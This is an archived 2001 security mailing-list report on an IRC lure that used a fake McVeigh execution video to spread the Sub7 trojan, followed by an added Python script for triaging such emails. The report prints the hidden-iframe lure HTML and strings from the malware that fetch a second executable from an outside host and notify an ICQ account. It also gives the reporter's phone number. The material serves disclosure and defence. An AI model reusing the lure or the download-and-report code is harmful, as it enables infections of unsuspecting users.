[ISN] Timothy McVeigh "video" link lures IRC users to install sub7.

From: Jay D. Dyson (jdysonat_private)
Date: Tue Jun 12 2001 - 10:16:10 PDT

    -----BEGIN PGP SIGNED MESSAGE-----
    
    Courtesy of Incidents List.
    
    
    Forwarded by: Adam Stanley <adamat_private>
    
    - -----Forwarded Message-----
    From: Bradley Chapman <eaglebtcat_private>
    To: ircat_private
    Subject: Timothy McVeigh "video" link lures IRC users to install sub7
    
    
    To whom it may concern:
    
    My name is Bradley Chapman, and I am a student at Brigham Young
    University.  Today on the EFNet IRC network, I found a channel called
    #mcveigh.  I suspected that this channel was not set up for the best of
    intentions.  Curious, I joined the room to see what was going on.  Almost
    immediately, I was assaulted with an "on-join" advertisement in the form
    of a channel notice.  The message asked me to visit the following link to
    view an .AVI movie of Tim McVeigh's execution: 
    
    http://www.concentric.net/~1horizon/veigh.html
    
    The page itself is blank.  After about 2 seconds, it forwards to an email
    link at: 
    
    http://www.concentric.net/~1horizon/unknown.eml
    
    This email link opens up a .tmp file, which does nothing.  The webpage now
    shows a "Connection Timed Out" message in the same web page.  I was
    suspicious when the email hyperlink tried to send me a .TMP file.  After
    examining that web page's HTML code, I determined it was a fake error
    designed to make people think that the video feed was too busy. (HTML code
    shown here): 
    
    ====================
    <HTML>
    <HEAD>
    </HEAD>
    <body bgcolor="black" link="#C0C0C0" vlink="#808080" alink="#FFFFFF" text="#8080FF"
    topmargin="0"><a name="top">
    <BODY bgColor=#ffffff>
    <iframe src=cid:THE-CID height=0 width=0></iframe>
    Connection timed out.(Busy server) Please try again later.<BR> // [note:
    fake message]
    </BODY>
    </HTML>
    ========================
    
    After using a download manager to save the email file directly, I opened
    it with Outlook Express.  I am fully aware of the risks of opening strange
    emails, but I know better than to actually run the included attachments. 
    There were two files inside - "ATT00013.txt" and "update.exe" .  I have
    thrown away the .txt file, since it was 0 bytes long.  I have packed
    update.exe as a ZIP file and attached it to this email. 
    
    Since this was obviously an email virus, I wanted to examine it with a hex
    editor for useful info.  Toward the end of the file, I found the following
    very interesting pieces of information: 
    
    ==================================
    %s\%s ie.exe
    home.earthlink.net
    /~goldianstone/ie.exe
    GET %s HTTP/1.0
    Host: %s
    119657247
    GET /scripts/WWPMsg.dll?from=psychward&fromemail=wwwpw&subject=file+downloaded&body=%s+downloaded+and+executed&to=%s
    wwp.icq.com
    ==================================
    
    As you can see, this program attempts a connection with
    home.earthlink.net, and accesses the URL "/~goldianstone/ie.exe" .  I
    presume this file would be downloaded and executed on the victim's
    computer.  Also interesting to note is the ICQ # there: 119657247,
    accompanied by the WWPMsg.dll script reference (which passes the sub7 info
    to the ICQ #).  I contacted the ICQ#, thinking he/she was the owner of the
    sub7 bots.  I did make contact, but the conversation I had was not what I
    expected: (see attached file "treesnods.txt") 
    
    ===================================
    SUMMARY: She (according to her ICQ Info) is getting flooded with ICQ notices
    from unknown addresses regarding sub7 information.  I tried to get her to
    save the log from these notices, but she admitted she was not very
    computer-savvy.  I tried many different ways of somehow retrieving the
    information, (netmeeting for supervision, winzip to compress the 2000b
    folder) but to no avail.  I finally gave up and told her that her ICQ
    log--in which she mentions a large number of sub7 messages--would be
    sufficient for the email to the ISPs of the offending #mcveigh channel
    operators.
    ===================================
    
    I then re-entered #mcveigh and proceeded to tell the whole channel what
    the link was really about.  Not more than 15 seconds later, one of the
    channel operators kick-banned me with the following message: 
    
    [23:17:23] *** You were kicked from #mcveigh by low (dont be an idiot, thats
    what the fbi wants you to think)
    
    I didn't care; I had all the info I needed anyway.  I backscrolled through
    the status screen and copied the list of #mcveigh users, then did a /whois
    on the channel operators.  Based on their hostmask, I now knew which ISPs
    I'd send a "nice letter."
    
    The third attached file (mcveigh.txt) is the user list and /whois results of
    just the channel operators.  As you'll see, several of them were in these
    rooms together: #astral_projection, #only.hard.nigs.pimp.and.roll.here,
    #minnesota, and #aol .
    
    I hope this information is helpful in stopping a potential situation, and in
    possibly disciplining those responsible for it.  If treesnods's estimate is
    accurate--that is, if there are 60-70 sub7-controlled computers just 18
    hours after the execution, and that growth rate continues in the aftermath
    of McVeigh's death--then some websites may be in trouble and should be
    putting up their shields.
    
    I appreciate your time and effort spent on resolving this issue.  I
    apologize for the length of this email, but I felt that all this info was
    necessary to prove a point.  I look forward to hearing from each service
    provider.
    
    Regards,
    
     - Brad Chapman
    Brigham Young University
    801-371-4007
    
    -----BEGIN PGP SIGNATURE-----
    Version: 2.6.2
    Comment: See http://www.treachery.net/~jdyson/ for current keys.
    
    iQCVAwUBOyZATtCClfiU/BIVAQEUXAP+JYjLv/F/J1S+dR3+5WKa4MBIgNgLQLh+
    HSyYQ3euz5GqfhgKVY+gg1dQnlMqkiijkKeiNsSf5K07h5fn9s+Rknx7t/J+nHeN
    77g+dLb8ypf30LPwQouAdeJQIgIRrCu4Cs4OQzvljpsHNEdmSnZyY8tvoOmtpjRt
    bPbsqD4Drn4=
    =SeEZ
    -----END PGP SIGNATURE-----
    
    
    ISN is hosted by SecurityFocus.com
    ---
    To unsubscribe email isn-unsubscribeat_private
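An added example, not part of the forwarded post or of the ISN archive: a small Python triage script that reproduces the two checks Chapman did by hand. It parses an .eml for an HTML part whose hidden iframe uses a cid: source that resolves to an executable attachment (the auto-execute lure pattern described above), then pulls printable strings out of that attachment and lists the hostnames, URL paths, HTTP request templates and bare numeric IDs it embeds. The MIME message and the payload bytes are constructed here from the strings quoted in the post; they are not the real unknown.eml or update.exe, and the regexes are triage heuristics, not a signature.

```python
import email
import re
from email import policy
from email.message import EmailMessage

EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".vbs")
# Dotted names whose last label is a file extension are not hostnames
# (the strings dump above contains "ie.exe" and "WWPMsg.dll").
NOT_TLD = {"exe", "dll", "tmp", "txt", "htm", "html", "eml"}

IFRAME_CID_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']?cid:([^\s\"'>]+)", re.I)
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,6}\b", re.I)
PATH_RE = re.compile(r"/[A-Za-z~][\w~./?&=+%-]*")   # URL path, query string included
UIN_RE = re.compile(r"^\d{5,9}$")                   # bare number: ICQ UIN candidate

# Constructed stand-in for update.exe: an MZ header plus the strings the
# post reports finding with a hex editor. Not the real binary.
FAKE_PAYLOAD = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"%s\\%s ie.exe\x00home.earthlink.net\x00/~goldianstone/ie.exe\x00"
    b"GET %s HTTP/1.0\r\nHost: %s\r\n\x00119657247\x00"
    b"GET /scripts/WWPMsg.dll?from=psychward&fromemail=wwwpw&subject=file+downloaded"
    b"&body=%s+downloaded+and+executed&to=%s\x00wwp.icq.com\x00"
)


def build_sample_eml() -> bytes:
    """Constructed .eml shaped like the one described in the post."""
    msg = EmailMessage()
    msg["From"] = "nobody@example.invalid"    # constructed addresses
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "unknown"
    msg.set_content("Connection timed out.")
    msg.add_alternative(
        "<html><body>"
        "<iframe src=cid:THE-CID height=0 width=0></iframe>"
        "Connection timed out.(Busy server) Please try again later.<br>"
        "</body></html>",
        subtype="html",
    )
    msg.add_attachment(FAKE_PAYLOAD, maintype="application", subtype="octet-stream",
                       filename="update.exe", cid="<THE-CID>")
    return msg.as_bytes()


def extract_strings(data: bytes, min_len: int = 6) -> list[str]:
    """Rough equivalent of strings(1): runs of printable ASCII."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def find_iocs(strings: list[str]) -> dict:
    """Pull hostnames, URL paths, HTTP request templates and bare numeric IDs."""
    hosts, paths, uins, requests = set(), set(), set(), set()
    for s in strings:
        for h in HOST_RE.findall(s):
            if h.rsplit(".", 1)[-1].lower() not in NOT_TLD:
                hosts.add(h.lower())
        paths.update(PATH_RE.findall(s))
        if UIN_RE.match(s.strip()):
            uins.add(s.strip())
        if s.startswith(("GET ", "POST ")):
            requests.add(s)
    return {"hosts": sorted(hosts), "paths": sorted(paths),
            "uins": sorted(uins), "requests": sorted(requests)}


def analyze_eml(raw: bytes) -> dict:
    """Flag an HTML part whose iframe points at a cid: that names an executable
    attachment, then extract indicators from every executable attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    iframe_cids, attachments = [], {}       # attachments: filename -> (cid, bytes)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            iframe_cids += [c.strip("<>") for c in IFRAME_CID_RE.findall(part.get_content())]
        elif part.get_filename():
            cid = (part.get("Content-ID") or "").strip("<>")
            attachments[part.get_filename()] = (cid, part.get_payload(decode=True) or b"")
    executables = [n for n in attachments if n.lower().endswith(EXEC_EXT)]
    auto_exec = [n for n in executables if attachments[n][0] in iframe_cids]
    return {
        "iframe_cids": iframe_cids,
        "attachments": sorted(attachments),
        "auto_exec": auto_exec,              # iframe -> cid -> executable: the lure pattern
        "iocs": {n: find_iocs(extract_strings(attachments[n][1])) for n in executables},
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyze_eml(build_sample_eml()), indent=2))
```

Run against a real saved .eml, `auto_exec` is the field that matters: a hidden iframe whose cid: resolves to an .exe attachment is the mechanism the post describes, and it is visible from the MIME structure alone without rendering the message in a mail client. The `hosts` and `paths` lists are what you would hand to the hosting providers; `uins` is only a candidate list, since any five-to-nine digit string in a binary will land there.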
    



    This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 00:19:41 PDT